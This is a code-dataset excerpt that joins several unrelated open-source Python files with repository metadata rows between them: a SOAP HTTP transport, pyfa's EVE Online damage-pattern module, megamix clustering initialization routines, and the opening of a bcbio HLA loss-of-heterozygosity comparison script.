@rtype: string
"""
ns = self.namespace
soapaction = '%s#%s' % (ns[1], soapmethod)
payload = build_soap_call('{%s}%s' % (ns[1], soapmethod),
kwargs, encoding=None,
header_args=self.soap_header)
try:
result = HTTPTransport().call(self.url, payload, ns,
soapaction=soapaction, encoding='utf-8')
except Exception as e:
raise HTTPError(e.code, str(e))
_, _, res, _ = parse_soap_call(result)
return res
class HTTPTransport(object):
""" Wrapper class for a HTTP SOAP call. It contain the call() method that
can perform calls and return the response payload.
"""
def call(self, addr, data, namespace, soapaction=None, encoding=None):
""" Builds and performs an HTTP request. Returns the response payload.
@param addr: address to receive the request in the form
schema://hostname:port
@param data: data to be sent
@param soapaction: soap action to be called
@param encoding: encoding for the message
@type addr: string
@type data: string
@type soapaction: string
@type encoding: string
@return: response payload
@rtype: string
"""
# Build a request
addr = parse_url(addr)
real_addr = '%s:%d' % (addr.hostname, addr.port)
real_path = addr.path
if addr.query != '':
real_path += '?%s' % addr.query
if addr.scheme == 'https':
r = http.client.HTTPSConnection(real_addr)
else:
r = http.client.HTTPConnection(real_addr)
r.putrequest("POST", real_path)
r.putheader("Host", addr.hostname)
r.putheader("User-agent", USER_AGENT)
t = 'text/xml'
if encoding:
t += '; charset="%s"' % encoding
r.putheader("Content-type", t)
r.putheader("Content-length", str(len(data)))
# if user is not a user:passwd format
if addr.username != None:
val = base64.encodestring(addr.user)
r.putheader('Authorization', 'Basic ' + val.replace('\012', ''))
# This fixes sending either "" or "None"
if soapaction:
r.putheader("SOAPAction", '"%s"' % soapaction)
else:
r.putheader("SOAPAction", "")
r.endheaders()
r.send(data.encode('UTF-8'))
#read response line
reply=r.getresponse()
code, msg, headers = reply.code, reply.code,reply.headers
content_type = headers.get("content-type", "text/xml")
content_length = headers.get("Content-length")
if content_length == None:
data = reply.read()
message_len = len(data)
else:
message_len = int(content_length)
data = reply.read(message_len)
def startswith(string, val):
return string[0:len(val)] == val
if code == 500 and not \
(startswith(content_type, "text/xml") and message_len > 0):
raise HTTPError(code, msg)
if code not in (200, 500):
raise HTTPError(code, msg)
#return response payload
return data.decode('utf-8')
class HTTPError(Exception):
""" Represents an error of a HTTP request.
"""
def __init__(self, code, msg):
""" Constructor for the HTTPError class.
@param code: error code
@param msg: error message
@type code: string
@type msg: string
"""
self.code = code
self.msg = msg
def __repr__(self):
return "<HTTPError %s %s>" % (self.code, str(self.msg))
def __call___(self):
return (self.code, self.msg, )
| aleixq/python3-brisa | brisa/upnp/soap.py | Python | mit | 12,811 | [
"Brian"
] | a57462087bcd0f71b66a3aff299ea25391866379216f58869c8eee44f1add0a1 |
# ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
import re
from collections import OrderedDict
from sqlalchemy.orm import reconstructor
import eos.db
def _t(x):
return x
def _c(x):
return '[' + x + ']'
# Order is significant here - UI uses order as-is for built-in patterns
BUILTINS = OrderedDict([
(-1, (_t('Uniform'), 25, 25, 25, 25)),
(-2, (_c(_t('Generic')) + _t('EM'), 1, 0, 0, 0)),
(-3, (_c(_t('Generic')) + _t('Thermal'), 0, 1, 0, 0)),
(-4, (_c(_t('Generic')) + _t('Kinetic'), 0, 0, 1, 0)),
(-5, (_c(_t('Generic')) + _t('Explosive'), 0, 0, 0, 1)),
(-6, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Aurora'), 5, 3, 0, 0)),
(-7, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Scorch'), 9, 2, 0, 0)),
(-8, (_c(_t('Frequency Crystals')) + _t('Radio'), 5, 0, 0, 0)),
(-9, (_c(_t('Frequency Crystals')) + _t('Microwave'), 4, 2, 0, 0)),
(-10, (_c(_t('Frequency Crystals')) + _t('Infrared'), 5, 2, 0, 0)),
(-11, (_c(_t('Frequency Crystals')) + _t('Standard'), 5, 3, 0, 0)),
(-12, (_c(_t('Frequency Crystals')) + _t('Ultraviolet'), 6, 3, 0, 0)),
(-13, (_c(_t('Frequency Crystals')) + _t('Xray'), 6, 4, 0, 0)),
(-14, (_c(_t('Frequency Crystals')) + _t('Gamma'), 7, 4, 0, 0)),
(-15, (_c(_t('Frequency Crystals')) + _t('Multifrequency'), 7, 5, 0, 0)),
(-16, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Gleam'), 7, 7, 0, 0)),
(-17, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Conflagration'), 7.7, 7.7, 0, 0)),
# Different sizes of plasma do different damage ratios, the values here
# are average of ratios across sizes
(-18, (_c(_t('Exotic Plasma')) + '|' + _t('[T2] Mystic'), 0, 66319, 0, 33681)),
(-19, (_c(_t('Exotic Plasma')) + _t('Meson'), 0, 60519, 0, 39481)),
(-20, (_c(_t('Exotic Plasma')) + _t('Baryon'), 0, 59737, 0, 40263)),
(-21, (_c(_t('Exotic Plasma')) + _t('Tetryon'), 0, 69208, 0, 30792)),
(-22, (_c(_t('Exotic Plasma')) + '|' + _t('[T2] Occult'), 0, 55863, 0, 44137)),
(-23, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Spike'), 0, 4, 4, 0)),
(-24, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Null'), 0, 6, 5, 0)),
(-25, (_c(_t('Hybrid Charges')) + _t('Iron'), 0, 2, 3, 0)),
(-26, (_c(_t('Hybrid Charges')) + _t('Tungsten'), 0, 2, 4, 0)),
(-27, (_c(_t('Hybrid Charges')) + _t('Iridium'), 0, 3, 4, 0)),
(-28, (_c(_t('Hybrid Charges')) + _t('Lead'), 0, 3, 5, 0)),
(-29, (_c(_t('Hybrid Charges')) + _t('Thorium'), 0, 4, 5, 0)),
(-30, (_c(_t('Hybrid Charges')) + _t('Uranium'), 0, 4, 6, 0)),
(-31, (_c(_t('Hybrid Charges')) + _t('Plutonium'), 0, 5, 6, 0)),
(-32, (_c(_t('Hybrid Charges')) + _t('Antimatter'), 0, 5, 7, 0)),
(-33, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Javelin'), 0, 8, 6, 0)),
(-34, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Void'), 0, 7.7, 7.7, 0)),
(-35, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Tremor'), 0, 0, 3, 5)),
(-36, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Barrage'), 0, 0, 5, 6)),
(-37, (_c(_t('Projectile Ammo')) + _t('Carbonized Lead'), 0, 0, 4, 1)),
(-38, (_c(_t('Projectile Ammo')) + _t('Nuclear'), 0, 0, 1, 4)),
(-39, (_c(_t('Projectile Ammo')) + _t('Proton'), 3, 0, 2, 0)),
(-40, (_c(_t('Projectile Ammo')) + _t('Depleted Uranium'), 0, 3, 2, 3)),
(-41, (_c(_t('Projectile Ammo')) + _t('Titanium Sabot'), 0, 0, 6, 2)),
(-42, (_c(_t('Projectile Ammo')) + _t('EMP'), 9, 0, 1, 2)),
(-43, (_c(_t('Projectile Ammo')) + _t('Phased Plasma'), 0, 10, 2, 0)),
(-44, (_c(_t('Projectile Ammo')) + _t('Fusion'), 0, 0, 2, 10)),
(-45, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Quake'), 0, 0, 5, 9)),
(-46, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Hail'), 0, 0, 3.3, 12.1)),
(-47, (_c(_t('Missiles')) + _t('Mjolnir'), 1, 0, 0, 0)),
(-48, (_c(_t('Missiles')) + _t('Inferno'), 0, 1, 0, 0)),
(-49, (_c(_t('Missiles')) + _t('Scourge'), 0, 0, 1, 0)),
(-50, (_c(_t('Missiles')) + _t('Nova'), 0, 0, 0, 1)),
(-51, (_c(_t('Bombs')) + _t('Electron Bomb'), 6400, 0, 0, 0)),
(-52, (_c(_t('Bombs')) + _t('Scorch Bomb'), 0, 6400, 0, 0)),
(-53, (_c(_t('Bombs')) + _t('Concussion Bomb'), 0, 0, 6400, 0)),
(-54, (_c(_t('Bombs')) + _t('Shrapnel Bomb'), 0, 0, 0, 6400)),
# Source: ticket #2067 and #2265
(-55, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('All'), 126, 427, 218, 230)),
(-109, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Angel'), 450, 72, 80, 398)),
(-107, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Concord'), 53, 559, 94, 295)),
(-56, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Drifter'), 250, 250, 250, 250)),
(-57, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Drones'), 250, 250, 250, 250)),
(-58, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Overmind'), 0, 410, 590, 0)),
(-108, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Sansha'), 569, 431, 0, 0)),
(-59, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Seeker'), 402, 402, 98, 98)),
(-60, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Sleeper'), 313, 313, 187, 187)),
(-61, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Triglavian'), 0, 615, 0, 385)),
(-62, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Angel Cartel'), 1838, 562, 2215, 3838)),
(-63, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Blood Raiders'), 5067, 4214, 0, 0)),
(-64, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Guristas'), 0, 1828, 7413, 0)),
(-65, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Rogue Drone'), 394, 666, 1090, 1687)),
(-66, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Sanshas Nation'), 5586, 4112, 0, 0)),
(-67, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Serpentis'), 0, 5373, 4813, 0)),
(-68, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Cruor (Blood Raiders)'), 90, 90, 0, 0)),
(-69, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Dramiel (Angel)'), 55, 0, 20, 96)),
(-70, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Daredevil (Serpentis)'), 0, 110, 154, 0)),
(-71, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Succubus (Sanshas Nation)'), 135, 30, 0, 0)),
(-72, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Worm (Guristas)'), 0, 0, 228, 0)),
(-73, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Enyo'), 0, 147, 147, 0)),
(-74, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Hawk'), 0, 0, 247, 0)),
(-75, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Jaguar'), 36, 0, 50, 182)),
(-76, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Vengeance'), 232, 0, 0, 0)),
(-77, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Ashimmu (Blood Raiders)'), 260, 100, 0, 0)),
(-78, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Talos'), 0, 413, 413, 0)),
(-79, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Sentinel'), 0, 75, 0, 90)),
(-80, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Angel Cartel'), 369, 533, 1395, 3302)),
(-81, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Blood Raiders'), 6040, 5052, 10, 15)),
(-82, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Guristas'), 0, 1531, 9680, 0)),
(-83, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Rogue Drone'), 276, 1071, 1069, 871)),
(-84, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Sanshas Nation'), 3009, 2237, 0, 0)),
(-85, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Serpentis'), 0, 3110, 1929, 0)),
# Source: ticket #2067
(-86, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) + _t('Dread'), 0, 417, 0, 583)),
(-87, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) + _t('Normal Subcaps'), 0, 610, 0, 390)),
# To avoid errors on msgfmt, we have to mark that '0%' is meaning literally 0% with no-python-format.
# See also: https://github.com/vslavik/poedit/issues/645
(-88, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
# xgettext:no-python-format
_t('Subcaps w/missiles 0% spool up'), 367, 155, 367, 112)),
(-89, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
# xgettext:no-python-format
_t('Subcaps w/missiles 50% spool up'), 291, 243, 291, 175)),
(-90, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
# xgettext:no-python-format
_t('Subcaps w/missiles 100% spool up'), 241, 301, 241, 217)),
(-91, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Amarr EDENCOM Entities')) + _t('Dread/Subcaps'), 583, 417, 0, 0)),
(-92, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Caldari EDENCOM Entities')) + _t('Dread'), 1000, 0, 0, 0)),
(-93, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Caldari EDENCOM Entities')) + _t('Subcaps'), 511, 21, 29, 440)),
(-94, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Gallente EDENCOM Entities')) + _t('Dread/Subcaps'), 0, 417, 583, 0)),
(-95, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Minmatar EDENCOM Entities')) + _t('Dread'), 0, 0, 583, 417)),
(-96, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Minmatar EDENCOM Entities')) + _t('Subcaps'), 302, 136, 328, 234)),
(-110, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Drifter Entities'), 250, 250, 250, 250)),
(-112, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Sleeper Entities'), 265, 265, 235, 235)),
(-111, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Rogue Drone Entities'), 250, 250, 250, 250)),
(-97, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Amarr Empire'), 4464, 3546, 97, 0)),
(-98, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Caldari State'), 0, 2139, 4867, 0)),
(-99, (_c(_t('NPC')) + _c(_t('Mission')) + _t('CONCORD'), 336, 134, 212, 412)),
(-100, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Gallente Federation'), 9, 3712, 2758, 0)),
(-101, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Khanid'), 612, 483, 43, 6)),
(-102, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Minmatar Republic'), 1024, 388, 1655, 4285)),
(-103, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Mordus Legion'), 25, 262, 625, 0)),
(-104, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Thukker'), 0, 52, 10, 79)),
(-105, (_c(_t('NPC')) + _t('Sansha Incursion'), 1682, 1347, 3678, 3678)),
(-106, (_c(_t('NPC')) + _t('Sleepers'), 1472, 1472, 1384, 1384))])
class DamagePattern:
DAMAGE_TYPES = ('em', 'thermal', 'kinetic', 'explosive')
_builtins = None
def __init__(self, *args, **kwargs):
self.builtin = False
self.update(*args, **kwargs)
@reconstructor
def init(self):
self.builtin = False
def update(self, emAmount=25, thermalAmount=25, kineticAmount=25, explosiveAmount=25):
self.emAmount = emAmount
self.thermalAmount = thermalAmount
self.kineticAmount = kineticAmount
self.explosiveAmount = explosiveAmount
@classmethod
def getBuiltinList(cls):
if cls._builtins is None:
cls.__generateBuiltins()
return list(cls._builtins.values())
@classmethod
def getBuiltinById(cls, id):
if cls._builtins is None:
cls.__generateBuiltins()
return cls._builtins.get(id)
@classmethod
def getDefaultBuiltin(cls):
if cls._builtins is None:
cls.__generateBuiltins()
return cls._builtins.get(-1)
@classmethod
def __generateBuiltins(cls):
cls._builtins = OrderedDict()
for id, (rawName, em, therm, kin, explo) in BUILTINS.items():
pattern = DamagePattern(emAmount=em, thermalAmount=therm, kineticAmount=kin, explosiveAmount=explo)
pattern.ID = id
pattern.rawName = rawName
pattern.builtin = True
cls._builtins[id] = pattern
def calculateEhp(self, fit):
ehp = {}
for (type, attr) in (('shield', 'shieldCapacity'), ('armor', 'armorHP'), ('hull', 'hp')):
rawCapacity = fit.ship.getModifiedItemAttr(attr)
ehp[type] = self.effectivify(fit, rawCapacity, type)
return ehp
def calculateEffectiveTank(self, fit, tankInfo):
typeMap = {
"passiveShield": "shield",
"shieldRepair": "shield",
"armorRepair": "armor",
"armorRepairPreSpool": "armor",
"armorRepairFullSpool": "armor",
"hullRepair": "hull"
}
ereps = {}
for field in tankInfo:
if field in typeMap:
ereps[field] = self.effectivify(fit, tankInfo[field], typeMap[field])
return ereps
def effectivify(self, fit, amount, type):
type = type if type != "hull" else ""
totalDamage = sum((self.emAmount, self.thermalAmount, self.kineticAmount, self.explosiveAmount))
specificDivider = 0
for damageType in self.DAMAGE_TYPES:
# Compose an attribute name, then make sure the first letter is NOT capitalized
attrName = "%s%sDamageResonance" % (type, damageType.capitalize())
attrName = attrName[0].lower() + attrName[1:]
resonance = fit.ship.getModifiedItemAttr(attrName)
damage = getattr(self, "%sAmount" % damageType)
specificDivider += damage / float(totalDamage or 1) * resonance
return amount / (specificDivider or 1)
importMap = {
"em": "em",
"therm": "thermal",
"kin": "kinetic",
"exp": "explosive"
}
@classmethod
def oneType(cls, damageType, amount=100):
pattern = DamagePattern()
pattern.update(amount if damageType == "em" else 0,
amount if damageType == "thermal" else 0,
amount if damageType == "kinetic" else 0,
amount if damageType == "explosive" else 0)
return pattern
@classmethod
def importPatterns(cls, text):
lines = re.split('[\n\r]+', text)
patterns = []
numPatterns = 0
# When we import damage profiles, we create new ones and update old ones. To do this, get a list of current
# patterns to allow lookup
lookup = {}
current = eos.db.getDamagePatternList()
for pattern in current:
lookup[pattern.rawName] = pattern
for line in lines:
try:
if line.strip()[0] == "#": # comments
continue
line = line.split('#', 1)[0] # allows for comments
type, data = line.rsplit('=', 1)
type, data = type.strip(), data.split(',')
except (KeyboardInterrupt, SystemExit):
raise
except:
# Data isn't in correct format, continue to next line
continue
if type != "DamageProfile":
continue
numPatterns += 1
name, data = data[0], data[1:5]
fields = {}
for index, val in enumerate(data):
try:
fields["%sAmount" % cls.DAMAGE_TYPES[index]] = int(val)
except (KeyboardInterrupt, SystemExit):
raise
except:
continue
if len(fields) == 4: # Avoid possible blank lines
if name.strip() in lookup:
pattern = lookup[name.strip()]
pattern.update(**fields)
eos.db.save(pattern)
else:
pattern = DamagePattern(**fields)
pattern.rawName = name.strip()
eos.db.save(pattern)
patterns.append(pattern)
eos.db.commit()
return patterns, numPatterns
EXPORT_FORMAT = "DamageProfile = %s,%d,%d,%d,%d\n"
@classmethod
def exportPatterns(cls, *patterns):
out = "# Exported from pyfa\n#\n"
out += "# Values are in following format:\n"
out += "# DamageProfile = [name],[EM amount],[Thermal amount],[Kinetic amount],[Explosive amount]\n\n"
for dp in patterns:
out += cls.EXPORT_FORMAT % (dp.rawName, dp.emAmount, dp.thermalAmount, dp.kineticAmount, dp.explosiveAmount)
return out.strip()
@property
def name(self):
return self.rawName
@property
def fullName(self):
categories, tail = self.__parseRawName()
return '{}{}'.format(''.join('[{}]'.format(c) for c in categories), tail)
@property
def shortName(self):
return self.__parseRawName()[1]
@property
def hierarchy(self):
return self.__parseRawName()[0]
def __parseRawName(self):
categories = []
remainingName = self.rawName.strip() if self.rawName else ''
while True:
start, end = remainingName.find('['), remainingName.find(']')
if start == -1 or end == -1:
return categories, remainingName
splitter = remainingName.find('|')
if splitter != -1 and splitter == start - 1:
return categories, remainingName[1:]
categories.append(remainingName[start + 1:end])
remainingName = remainingName[end + 1:].strip()
def __deepcopy__(self, memo):
p = DamagePattern(self.emAmount, self.thermalAmount, self.kineticAmount, self.explosiveAmount)
p.rawName = "%s copy" % self.rawName
return p
| pyfa-org/Pyfa | eos/saveddata/damagePattern.py | Python | gpl-3.0 | 17,901 | [
"Jaguar"
] | 97b6bb3be90f3cab098bc98df75beb94c7767e755f08fe581cc8d3886939ca01 |
# -*- coding: utf-8 -*-
#
#Created on Mon Apr 3 15:14:34 2017
#
#author: Elina Thibeau-Sutre
#
import numpy as np
import random
def initialization_random(n_components,points):
"""
This method returns an array of k points which will be used in order to
initialize a k_means algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
assignements : an array (n_points,n_components)
The hard assignements according to kmeans
"""
n_points,_ = points.shape
idx = np.random.randint(n_points,size = n_components)
means = points[idx,:]
return means
def initialization_random_sklearn(n_components,points):
"""
This method returns an array of k points which will be used in order to
initialize a k_means algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
assignements : an array (n_points,n_components)
The hard assignements according to kmeans
"""
n_points,_ = points.shape
random_state = np.random.RandomState(2)
resp = random_state.rand(n_points,n_components)
resp /= resp.sum(axis=1)[:,np.newaxis]
return resp
def initialization_plus_plus(n_components,points,info=False):
"""
This method returns an array of k points which will be used in order to
initialize a k_means algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
assignements : an array (n_points,n_components)
The hard assignements according to kmeans
"""
from .kmeans import dist_matrix
points = np.asarray(points)
dist = None
n_points,dim = points.shape
probability_vector = np.arange(n_points)/n_points #All points have the same probability to be chosen the first time
means = np.zeros((n_components,dim))
for i in range(n_components):
total_dst = 0
#Choice of a new value
value_chosen = random.uniform(0,1)
idx_point = 0
value = 0
while (value<value_chosen) and (idx_point+1<n_points):
idx_point +=1
value = probability_vector[idx_point]
means[i] = points[idx_point]
#Calculation of distances for each point in order to find the probabilities to choose each point
if i == 0:
M = np.linalg.norm(points-means[0],axis=1)
M = M.reshape((n_points,1))
else:
M = dist_matrix(points,means[:i+1:])
dst_min = np.amin(M, axis=1)
dst_min = dst_min**2
total_dst = np.cumsum(dst_min)
probability_vector = total_dst/total_dst[-1]
if info:
from .kmeans import Kmeans
km = Kmeans(n_components)
km.means = means
km._is_initialized = True
dist = km.score(points)
return means, dist
return means
def initialization_AF_KMC(n_components,points,m=20):
"""
A method providing good seedings for kmeans inspired by MCMC
for more information see http://papers.nips.cc/paper/6478-fast-and-provably-good-seedings-for-k-means
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
assignements : an array (n_points,n_components)
The hard assignements according to kmeans
"""
from .kmeans import dist_matrix
n_points,dim = points.shape
means = np.empty((n_components,dim))
#Preprocessing step
idx_c = np.random.choice(n_points)
c = points[idx_c]
M = np.square(dist_matrix(points,c.reshape(1,-1)))
q = 0.5 * M / np.sum(M) + 0.5 / n_points
q = q.reshape(n_points)
#Main loop
means[0] = c
for i in range(n_components-1):
# We choose a potential candidate
x_idx = np.random.choice(n_points,p=q)
x = points[x_idx]
dist_x = np.linalg.norm(x-means[:i+1:],axis=1).min()
# dist_x = kmeans3.dist_matrix(x.reshape(1,-1),means[:i+1:]).min()
# We have m stM[x_idx]eps to improve this potential new center
for j in range(m):
y_idx = np.random.choice(n_points,p=q)
y = points[y_idx]
dist_y = np.linalg.norm(y-means[:i+1:],axis=1).min()
if dist_x*q[y_idx] != 0:
quotient = dist_y*q[x_idx]/(dist_x*q[y_idx])
else:
quotient = 2.0
if quotient > random.uniform(0,1):
x_idx = y_idx
x = y
dist_x = dist_y
means[i+1] = x
return means
def initialization_k_means(n_components,points,info=False):
"""
This method returns an array of k means which will be used in order to
initialize an EM algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
assignements : an array (n_points,n_components)
The hard assignements according to kmeans
"""
from .kmeans import Kmeans
points = np.asarray(points)
km = Kmeans(n_components)
km.fit(points)
assignements = km.predict_assignements(points)
if info:
dist=km.score(points)
return km.means,assignements,dist
return km.means,assignements
def initialization_GMM(n_components,points_data,points_test=None,covariance_type="full"):
"""
This method returns an array of k means and an array of k covariances (dim,dim)
which will be used in order to initialize an EM algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
cov : an array (n_components,dim,dim)
The initial covariances computed
log_weights : an array (n_components,)
The initial weights (log) computed
log_assignements : an array (n_points,n_components)
The log of the soft assignements according to GMM
"""
from .GMM import GaussianMixture
GM = GaussianMixture(n_components,covariance_type=covariance_type)
GM.fit(points_data,points_test,patience=0)
log_assignements = GM.predict_log_resp(points_data)
return GM.means,GM.cov,GM.log_weights,log_assignements
def initialization_VBGMM(n_components,points_data,points_test=None,covariance_type="full"):
"""
This method returns an array of k means and an array of k covariances (dim,dim)
which will be used in order to initialize an EM algorithm
Parameters
----------
points : an array (n_points,dim)
k : int
the number of clusters
Returns
-------
means : an array (n_components,dim)
The initial means computed
cov : an array (n_components,dim,dim)
The initial covariances computed
log_weights : an array (n_components,)
The initial weights (log) computed
log_assignements : an array (n_points,n_components)
The log of the soft assignements according to VBGMM
"""
from .VBGMM import VariationalGaussianMixture
GM = VariationalGaussianMixture(n_components)
GM.fit(points_data,points_test,patience=0)
log_assignements = GM.predict_log_resp(points_data)
return GM.means,GM.cov,GM.log_weights,log_assignements
def initialize_log_assignements(init,n_components,points_data,points_test=None,covariance_type="full"):
"""
This method initializes the Variational Gaussian Mixture by giving the value
of the responsibilities to the algorithm.
Parameters
----------
init : str
The method with which the algorithm can be initialized.
Must be in ['random','plus','AF_KMC','kmeans','GMM','VBGMM']
n_components : int
the number of clusters
points_data : an array (n_points,dim)
covariance_type : str
Type of covariance : 'full' or 'spherical'
Other Parameters
----------------
points_test : array (n_points_bis,dim) | Optional
Initializes using early stopping in order to avoid over fitting.
Returns
-------
log_assignements : an array (n_points,n_components)
The log of the soft assignements according to VBGMM
"""
from .kmeans import Kmeans
log_assignements = None
if (init == "random"):
means = initialization_random(n_components,points_data)
km = Kmeans(n_components)
km.means = means
assignements = km._step_E(points_data)
elif(init == "random_sk"):
assignements = initialization_random_sklearn(n_components,points_data)
elif(init == "plus"):
means = initialization_plus_plus(n_components,points_data)
km = Kmeans(n_components)
km.means = means
assignements = km._step_E(points_data)
elif(init == "AF_KMC"):
means = initialization_AF_KMC(n_components,points_data)
km = Kmeans(n_components)
km.means = means
assignements = km._step_E(points_data)
elif(init == "kmeans"):
_,assignements = initialization_k_means(n_components,points_data)
elif(init == "GMM"):
_,_,_,log_assignements = initialization_GMM(n_components,points_data,points_test,covariance_type)
elif(init == "VBGMM"):
_,_,_,log_assignements = initialization_VBGMM(n_components,points_data,points_test,covariance_type)
if log_assignements is None:
epsilon = np.finfo(assignements.dtype).eps
assignements += epsilon
assignements /= 1 + n_components * epsilon
log_assignements = np.log(assignements)
return log_assignements
def initialize_mcw(init,n_components,points_data,points_test=None,covariance_type="full"):
"""
This method initializes the Variational Gaussian Mixture by setting the values
of the means, the covariances and the log of the weights.
Parameters
----------
init : str
The method with which the algorithm can be initialized.
Must be in ['random','plus','AF_KMC','kmeans','GMM','VBGMM']
n_components : int
the number of clusters
points_data : an array (n_points,dim)
covariance_type : str
Type of covariance : 'full' or 'spherical'
Other Parameters
----------------
points_test : array (n_points_bis,dim) | Optional
Initializes using early stopping in order to avoid over fitting.
Returns
-------
means : an array (n_components,dim)
The initial means computed
cov : an array (n_components,dim,dim)
The initial covariances computed
log_weights : an array (n_components,)
The initial weights (log) computed
"""
n_points,dim = points_data.shape
log_weights = - np.log(n_components) * np.ones(n_components)
# Warning : the algorithm is very sensitive to these first covariances given
if covariance_type == "full":
cov_init = np.cov(points_data.T)
cov = np.tile(cov_init, (n_components,1,1))
elif covariance_type == "spherical":
cov_init = np.var(points_data, axis=0, ddof=1).mean()
cov = cov_init * np.ones(n_components)
if (init == "random"):
means = initialization_random(n_components,points_data)
elif(init == "plus"):
means = initialization_plus_plus(n_components,points_data)
elif(init == "AF_KMC"):
means = initialization_AF_KMC(n_components,points_data)
elif(init == "kmeans"):
means,_ = initialization_k_means(n_components,points_data)
elif(init == "GMM"):
means,cov,log_weights,_ = initialization_GMM(n_components,points_data,points_test,covariance_type)
elif(init == "VBGMM"):
means,cov,log_weights,_ = initialization_VBGMM(n_components,points_data,points_test,covariance_type)
return means,cov,log_weights | 14thibea/megamix | megamix/batch/initializations.py | Python | apache-2.0 | 12,778 | [
"Gaussian"
] | 9789e914be091f19805b4196d1a9700ad07b58686b7bfda945cf02efe98195f0 |
#!/usr/bin/env python
"""Run LOH heterogeneity comparison amongst mutiple methods, focusing on HLA.
Includes LOHHLA with inputs from a bcbio OptiType hg38, PureCN, TitanCNA Cromwell run.
Requires:
- pdftoppm (from poppler-utils) for plot generation from pdfs
"""
from __future__ import print_function
import collections
import csv
import glob
import StringIO as io
import os
import shutil
import subprocess
import sys
import yaml
from bcbio.pipeline import alignment
from bcbio import utils
HLA_GLOB="call-call_hla/shard-*/execution"
SV_GLOB="call-svcall/shard-*/wf-svcall.cwl/*/call-detect_sv/execution"
SVCALL_GLOB="structural/{sample}/{method}/*{ext}"
LOHHLA="../lohhla/lohhla"
